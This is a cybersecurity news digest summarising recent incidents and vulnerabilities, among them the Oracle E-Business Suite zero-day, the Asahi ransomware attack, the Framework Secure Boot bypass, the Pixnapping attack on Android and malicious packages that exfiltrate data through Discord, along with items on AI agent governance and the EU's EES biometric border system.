Daily Brief

Oracle addressed a critical zero-day vulnerability (CVE-2025-61884) in its E-Business Suite, exploited by ShinyHunters, with an out-of-band security update over the weekend. The vulnerability allowed unauthenticated remote access to sensitive resources, posing significant risks to affected systems. Despite the active exploitation, Oracle did not publicly disclose the issue's severity or the existence of a publicly leaked exploit. Researchers confirmed the fix addressed a pre-authentication Server-Side Request Forgery (SSRF) flaw, enhancing security against the leaked exploit. Oracle E-Business Suite users are urged to apply the latest patches to mitigate risks from known exploit chains and enhance system security. The Clop ransomware group and ShinyHunters have been linked to exploiting similar vulnerabilities, emphasizing the need for vigilance and timely patching. Security experts recommend implementing additional security measures, such as mod_security rules, to further protect vulnerable endpoints until patches are fully deployed.

FuzzingLabs accuses Gecko Security of replicating its vulnerability disclosures and claiming CVE credits, sparking a public dispute between the two cybersecurity firms. FuzzingLabs alleges Gecko copied proof-of-concepts and backdated blog posts to appear as the original discoverer of vulnerabilities. Gecko Security denies the allegations, attributing the situation to an unfortunate overlap and emphasizing direct coordination with project maintainers. FuzzingLabs claims to possess evidence of plagiarism, including unique identifiers in their exploits, and notes that multiple vulnerabilities on Gecko's site seem copied from other researchers. Gecko has since updated its blog posts to credit FuzzingLabs and adjusted publishing dates, while maintaining that some CVEs were marked as duplicates or invalid. The incident underscores challenges in managing duplicate vulnerability reports and the complexities of crediting in responsible disclosure practices. The broader security community remains divided, with some questioning Gecko's explanation and others highlighting the need for improved coordination in vulnerability reporting.

Asahi Brewer, a major Japanese beer producer, experienced a ransomware attack in September, causing significant operational disruptions and potential data breaches. The Qilin ransomware group claimed responsibility, alleging the theft of 27 GB of sensitive data, including contracts, employee records, and financial information. Initial reports suggested systems failures, but further investigation revealed traces of unauthorized data transfers, raising concerns about personal data exposure. The attack severely impacted Asahi's logistics, delaying shipments and forcing a temporary return to manual processing methods like pen and paper. Asahi postponed its quarterly financial results due to ongoing system outages and challenges in accessing accounting data, with no clear recovery timeline. The company is investigating the extent of the data breach and plans to notify affected individuals in compliance with data protection laws. A National Cyber Security Centre report indicates a 50% rise in ransomware attacks, suggesting a broader trend impacting businesses globally.

The rise of autonomous AI agents is reshaping enterprise operations, with these systems now performing tasks such as ticket management, log analysis, and incident remediation independently. Unlike traditional bots, these AI agents can interpret goals, plan steps, and interact with multiple systems, making them powerful yet potentially risky users within an organization. The complexity of multi-agent ecosystems complicates tracing actions back to their human initiators, posing challenges for accountability and oversight. Companies are facing the emergence of "shadow AI," where AI tools enter environments without formal security reviews, creating governance challenges. Traditional visibility tools struggle to detect these agents, which can operate at machine speed across cloud functions or virtual machines, eluding standard oversight mechanisms. To address these challenges, enterprises are advised to develop AI agent inventories, detailing each agent's purpose, permissions, and lifespan for better management. Effective governance strategies are crucial, requiring organizations to redefine access controls, ensure proper oversight, and prevent unauthorized actions by these autonomous systems. The shift towards recognizing AI agents as a distinct category of identity, beyond human or non-human, is essential for maintaining security and operational integrity.

Mozilla is initiating beta tests for a new built-in VPN feature in Firefox, selecting users at random to participate over the coming months. The Firefox VPN will be free and integrated within the browser, differing from Mozilla's existing paid VPN service, which supports multiple devices. This feature aims to enhance user privacy by routing web traffic through Mozilla-managed servers, masking IP addresses, and encrypting communications. Initially available on desktop, the VPN feature may expand to mobile platforms, reflecting Mozilla's ambition to create a leading VPN-integrated browser. Participants must register for a Mozilla account, and their VPN location will default to the best-performing server, primarily within the US. Mozilla will store minimal user logs for three months to improve performance and security, ensuring no logging of visited websites or communication content. The initiative comes amid increased interest in VPNs, especially in the UK, where they are used to bypass age verification checks under the Online Safety Act.

Approximately 200,000 Linux systems by Framework were shipped with UEFI components that could be exploited to bypass Secure Boot protections. The vulnerability stems from a 'memory modify' (mm) command in signed UEFI shells, allowing attackers to disable signature verification. Attackers can leverage this flaw to load bootkits like BlackLotus, which can evade OS-level security and persist through OS re-installs. Eclypsium identified that the mm command can overwrite the gSecurity2 variable, disrupting the Secure Boot trust chain. Framework is actively working on remediation, advising users to apply security updates or use secondary protection measures. Temporary mitigations include deleting Framework's DB key via BIOS and preventing unauthorized physical access to affected systems. This incident emphasizes the importance of thorough security validation in firmware components to prevent similar vulnerabilities.

Oracle issued an emergency patch for a critical vulnerability in its E-Business Suite, specifically targeting the Runtime UI component, tracked as CVE-2025-61884. The flaw carries a CVSS score of 7.5 and allows remote exploitation without authentication, posing significant risks to enterprise systems. This vulnerability could enable attackers to access sensitive resources, potentially leading to data theft or further network infiltration. Oracle advises immediate application of the patch or mitigations to protect against potential exploitation. The patch follows a recent fix for a zero-day vulnerability linked to Clop attacks, affecting numerous organizations, including universities and major enterprises. Google's Threat Intelligence Group reported "dozens" of confirmed victims, with expectations that the actual number exceeds a hundred. Harvard University is investigating a cybersecurity incident related to these Oracle EBS breaches, affecting a small administrative unit. The ongoing vulnerabilities in Oracle's EBS highlight the critical need for timely patch management and comprehensive security reviews.

Chinese state-sponsored hackers infiltrated a target environment for over a year using ArcGIS, a geo-mapping tool, to create a web shell for persistent access. The attackers, identified as the Flax Typhoon group, used valid administrator credentials to compromise a public-facing ArcGIS server linked to an internal network. By uploading a malicious Java SOE, the hackers executed base64-encoded commands through a REST API, masked as routine operations, ensuring covert control. To maintain persistence, the attackers installed SoftEther VPN Bridge, creating an outbound HTTPS tunnel to their server, facilitating lateral movement and data exfiltration. ReliaQuest researchers noted attempts to escalate privileges by targeting IT staff workstations, aiming to harvest credentials and deepen network infiltration. The use of SOE for such attacks is unprecedented, prompting Esri to update its documentation to alert users of potential risks associated with malicious SOEs. The incident underscores the need for organizations to monitor legitimate software for unusual activity and strengthen internal network defenses against advanced persistent threats.

Security Awareness Month, initiated by CISA and the National Cybersecurity Alliance, aims to foster safer digital habits among individuals and organizations. While awareness campaigns improve employee behavior, they often fail to address deeper vulnerabilities like misconfigurations and excessive privileges. Traditional defenses focus on detection and response, missing proactive measures essential for identifying and mitigating threats early. Proactive threat hunting identifies potential attack vectors such as misconfigurations and exposed credentials before they can be exploited. Continuous Threat Exposure Management (CTEM) offers a structured approach to threat modeling and control validation, strengthening overall security posture. Attackers leverage AI-driven automation for rapid infrastructure mapping, necessitating defenders to adopt similar proactive strategies for effective protection. Organizations are encouraged to shift from awareness to readiness, ensuring defenses are robust and capable of withstanding real-world threats.

AMD has issued fixes for a critical vulnerability, RMPocalypse, affecting its Secure Encrypted Virtualization with Secure Nested Paging (SEV-SNP) technology, impacting confidential computing security. Researchers from ETH Zürich identified the flaw, which allows a single 8-byte memory write to compromise the Reverse Map Paging (RMP) table, undermining security metadata for DRAM pages. The vulnerability, CVE-2025-0033, is attributed to a race condition during the initialization of the AMD Secure Processor, allowing malicious hypervisors to manipulate RMP content. Exploitation could lead to unauthorized access, activation of hidden functions, and exfiltration of sensitive data from confidential virtual machines with complete success. Microsoft and Supermicro have acknowledged the issue, with Microsoft working on remediation for Azure Confidential Computing and Supermicro requiring BIOS updates for affected motherboards. This incident underscores the need for robust security mechanisms in virtualization technologies, as incomplete protections can lead to significant breaches. The discovery follows recent findings of similar vulnerabilities in cloud processors, emphasizing ongoing challenges in securing virtualized environments.

Researchers have discovered a vulnerability in Android devices from Google and Samsung, named Pixnapping, enabling rogue apps to steal two-factor authentication codes covertly. The attack exploits Android APIs and a hardware side-channel, allowing malicious apps to capture sensitive data, such as 2FA codes, in under 30 seconds without special permissions. The vulnerability affects Android versions 13 to 16, with the potential to impact all devices running these versions, though the study focused on five specific models. Google has issued patches for the vulnerability under CVE-2025-48561, but a workaround exists that could re-enable the Pixnapping attack, prompting ongoing efforts for a comprehensive fix. The flaw also allows attackers to determine if specific apps are installed on a device, bypassing Android's app list restrictions, which Google has decided not to address. This vulnerability underscores the need for enhanced security measures in app design, particularly for sensitive applications, to mitigate risks from such side-channel attacks. Organizations should ensure their Android devices are updated with the latest security patches and educate users on the risks of installing untrusted apps.

The UK's National Cyber Security Centre (NCSC) reported a 50% increase in high-severity cyberattacks, with 204 nationally significant incidents in the past year. Despite a stable number of total incidents, the rise in severity signals growing exposure to serious impacts on business operations and national resilience. NCSC's Chief Executive emphasized the urgency for businesses to strengthen cybersecurity measures, warning that hesitation poses a significant vulnerability. Senior UK ministers are reaching out to FTSE 100 and 250 companies, urging them to prioritize cybersecurity at the board level and adopt NCSC's Early Warning service. Companies are encouraged to implement the Cyber Essentials standard, which significantly reduces the likelihood of cyber insurance claims and enhances supply chain security. Recent cyberattacks on major UK brands, such as M&S and Jaguar Land Rover, serve as a critical reminder of the need for robust cybersecurity strategies. The NCSC's report calls for immediate action from business leaders to ensure continuity plans are in place, highlighting the importance of preparedness in the face of potential infrastructure disruptions.

AI is transforming reconnaissance by enabling attackers to map environments with increased speed and precision, enhancing their understanding of system behaviors. While AI is not yet executing attacks autonomously, it accelerates information gathering and enriches data, aiding attackers in identifying potential vulnerabilities. The technology excels in parsing unstructured data, such as website content and error messages, providing attackers with a comprehensive view of target infrastructures. AI's ability to generate realistic credential combinations and adapt to system behaviors improves the effectiveness of brute force and credential harvesting attacks. Attackers benefit from AI's contextual awareness, reducing false positives and enabling more targeted and efficient attack strategies. The expanded definition of exposure in the AI era includes not just direct vulnerabilities but also inferable information from metadata and naming conventions. Defenders must adopt AI-driven strategies to anticipate attacker insights and continuously validate their security postures to keep pace with evolving threats.

Cybersecurity researchers identified malicious packages across npm, Python, and Ruby ecosystems, using Discord channels for command-and-control to exfiltrate developer data. Discord webhooks, which are write-only, allow attackers to transmit data without exposing channel history, complicating detection and response efforts. Malicious packages utilize install-time hooks to steal sensitive information like .env files and API keys from developer environments before runtime monitoring can detect them. The Contagious Interview campaign, linked to North Korean actors, used 338 fake packages to distribute malware, targeting Web3, cryptocurrency, and blockchain developers. Threat actors employed over 180 fake personas on platforms like LinkedIn to lure targets into downloading booby-trapped repositories, leading to credential and data theft. Malicious packages included typosquats and lookalikes of legitimate libraries, facilitating stealthy infiltration into developer workflows and environments. The campaign exemplifies a state-directed, factory-style approach to supply chain threats, emphasizing the need for robust security measures and vigilance in software ecosystems.

The European Union's new biometric Exit/Entry System (EES) launched at Prague's international airport, encountering significant operational issues, including malfunctioning equipment and manual processing. Travelers experienced delays of up to 90 minutes due to non-functional self-service enrollment machines, impacting the airport's efficiency and passenger satisfaction. The EES requires non-EU travelers to register fingerprints and facial biometrics, aiming to streamline border control processes across the Schengen area. Prague Airport responded to the situation by warning passengers of potential delays during the initial phase and worked to resolve equipment issues swiftly. The EES rollout is part of a broader EU initiative, with full implementation expected by March 2026, alongside the upcoming European Travel Information and Authorisation System (ETIAS). The Czech Republic, Estonia, and Luxembourg opted for immediate EES implementation, impacting popular travel destinations like Prague, which saw a significant increase in British visitors. Despite initial setbacks, the system's operational improvements are crucial for maintaining efficient border management and accommodating rising passenger volumes.